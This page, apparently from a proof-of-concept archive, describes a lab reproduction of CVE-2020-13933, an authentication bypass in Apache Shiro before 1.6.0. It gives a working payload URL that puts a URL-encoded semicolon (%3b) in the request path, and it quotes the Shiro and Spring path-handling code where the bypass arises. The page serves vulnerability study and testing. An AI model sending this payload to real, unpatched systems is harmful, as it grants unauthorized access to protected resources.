Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2020-13933 PoC — Apache Shiro 授权问题漏洞

Source
https://github.com/EXP-Docs/CVE-2020-13933
Associated Vulnerability
Title:Apache Shiro 授权问题漏洞 (CVE-2020-13933)
Description:Apache Shiro before 1.6.0, when using Apache Shiro, a specially crafted HTTP request may cause an authentication bypass.
Description
CVE-2020-13933 靶场: shiro 认证绕过漏洞
Readme
# CVE-2020-13933 靶场

> shiro < 1.6.0 身份认证绕过漏洞

------

## PoC

[http://127.0.0.1:8080/res/%3bpoc](http://127.0.0.1:8080/res/%3bpoc)


## 靶场环境

![](https://img.shields.io/badge/JDK-1.8-brightgreen.svg) ![](https://img.shields.io/badge/Spring-2.3.3-brightgreen.svg) ![](https://img.shields.io/badge/Shiro-1.5.3-brightgreen.svg)


## 代码说明

- [`ShiroConfig.java`](/src/main/java/com/exp/cve/ShiroConfig.java): 
<br/>  权限配置, 当请求 `/res/*` 资源时, 302 跳转到登陆页面进行身份认证
- [`NameController.java`](/src/main/java/com/exp/cve/NameController.java): 
<br/>  · `/res/{name}`: 请求名为 `name` 的的资源(触发身份认证)
<br/>  · `/res/`: 不请求任何资源(不触发身份认证)


## 靶场验证

不在请求路由中指定资源名称时,不触发身份验证,也无资源返回: [`http://127.0.0.1:8080/res/`](http://127.0.0.1:8080/res/)

![](/imgs/01.png)

在请求路由中指定资源名称时,302 跳转到身份验证页面: [`http://127.0.0.1:8080/res/poc`](http://127.0.0.1:8080/res/poc)

![](/imgs/02.png)

构造特定 PoC 请求指定资源时,不触发身份验证,并返回资源: [http://127.0.0.1:8080/res/%3bpoc](http://127.0.0.1:8080/res/%3bpoc) (`%3b` 是 `;` 的 URL 编码)

![](/imgs/03.png)


## 漏洞 DEBUG 位置

### shiro-web-1.5.3.jar

```java
// org.apache.shiro.web.util.WebUtils.java
// line 111

public static String getPathWithinApplication(HttpServletRequest request) {
    return normalize(removeSemicolon(getServletPath(request) + getPathInfo(request)));
}
```

### spring-web-5.2.5.RELEASE.jar

```java
// org.springframework.web.util.UrlPathHelper.java
// line 459

private String decodeAndCleanUriString(HttpServletRequest request, String uri) {
    uri = removeSemicolonContent(uri);
    uri = decodeRequestString(request, uri);
    uri = getSanitizedPath(uri);
    return uri;
}
```
File Snapshot

 [4.0K]  /data/pocs/f902623a8371685eaa094041348558558892b569
├── [4.0K]  imgs
│   ├── [216K]  01.png
│   ├── [239K]  02.png
│   └── [208K]  03.png
├── [4.0K]  pom.xml
├── [1.9K]  README.md
└── [4.0K]  src
    ├── [4.0K]  main
    │   ├── [4.0K]  java
    │   │   ├── [4.0K]  com
    │   │   │   └── [4.0K]  exp
    │   │   │       └── [4.0K]  cve
    │   │   │           ├── [ 277]  Main.java
    │   │   │           ├── [ 575]  MyRealm.java
    │   │   │           ├── [ 753]  NameController.java
    │   │   │           └── [1.3K]  ShiroConfig.java
    │   │   └── [4.0K]  org
    │   │       ├── [4.0K]  apache
    │   │       │   └── [4.0K]  shiro
    │   │       │       └── [4.0K]  web
    │   │       │           └── [4.0K]  util
    │   │       │               └── [ 30K]  WebUtils.java
    │   │       └── [4.0K]  springframework
    │   │           └── [4.0K]  web
    │   │               └── [4.0K]  util
    │   │                   └── [ 22K]  UrlPathHelper.java
    │   └── [4.0K]  resources
    │       └── [   0]  application.properties
    └── [4.0K]  test
        ├── [4.0K]  java
        │   └── [4.0K]  com
        │       └── [4.0K]  exp
        │           └── [4.0K]  cve
        │               └── [ 189]  TestMain.java
        └── [4.0K]  resources
            └── [  60]  测试资源目录.txt

22 directories, 14 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →